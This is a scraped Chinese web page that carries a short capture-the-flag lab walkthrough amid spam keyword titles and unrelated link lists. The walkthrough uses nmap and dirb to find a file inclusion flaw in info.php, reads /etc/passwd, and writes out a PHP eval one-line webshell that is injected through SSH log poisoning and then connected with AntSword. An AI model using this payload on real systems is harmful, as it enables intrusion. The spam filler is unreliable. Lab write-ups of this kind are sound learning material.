当前位置: 首页 > news >正文

自己做的网站能干站什么常州哪里做网站

自己做的网站能干站什么,常州哪里做网站,网站建设教程步骤,移动网站建设哪家快1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉&#xff0…

1.使用nmap扫描同网段的端口,发现靶机地址

2.访问到主页面,只能看到一个大西红柿

3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image

4.访问我们扫到的地址 ,点金目录里看看有些什么文件

5.看到info.php很熟悉,点进去看看

 

6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞

7. 利用文件包含漏洞,我们尝试查看一下passwd文件内容,可以成功

 

 8.再来看看日志文件发现记录了ssh登录的登录日志,利用这个机制写入一句话木马

"<?php @eval($_POST[cmd]);?>"@172.16.1.200 -p 2211 

 

9.写入之后使用蚁剑连接

http://www.yayakq.cn/news/16646/

相关文章:

  • 网站文件结构金塔精神文明建设网站
  • 网站建设合同不给版权百度批量查询工具
  • 老河口城乡建设局网站专做恐怖片的网站
  • wordpress在哪儿打开无排名优化
  • 体育直播网站源码下载 iis 网站
  • 卡密网站怎么做开车网址来一个
  • 简洁大方的电商网站模板河北省香河县建设局网站
  • 网站关键词优化的步骤厦门博客网站制作
  • 萧山网站建设xssem可画官网登录入口
  • 重庆市建设工程信息网官网安全监督渝快办网站优化培训好学吗
  • 自己做网站内容读取太慢广西网站建设在线
  • 网站维护入门教程专业企业网站建设公司
  • 谷歌外贸网站建站wordpress 恢复默认
  • c语言开发网站教程深圳设计展2022
  • 建站工具上市asp网站开发工具神器
  • 在家里怎样做网站WordPress灯箱效果移动适配
  • 网站设计服务合同泰安城建吧
  • 网站隐私条款模板水友做的yyf网站
  • 门户网站建设方案泰州网站设计公司
  • 太原网站建设费用网站建设预算申请表
  • 聊城网站建设首选天成网络wordpress 后台文章
  • 国内自助建站定制美瞳网站建设
  • 网站如何留言临淄房产信息网
  • 做毕设网站建设电子网站试卷
  • 网站关键词如何部署做的漂亮的商务网站
  • 百度站长社区电商网站项目建设
  • 设计的很好的网站阿里云快速做网站
  • 没有固定ip做网站大同网站建设熊掌号
  • 江西会昌建设局网站网站续费多少钱
  • 企业网站建设的核心是深圳网站设计专业乐云seo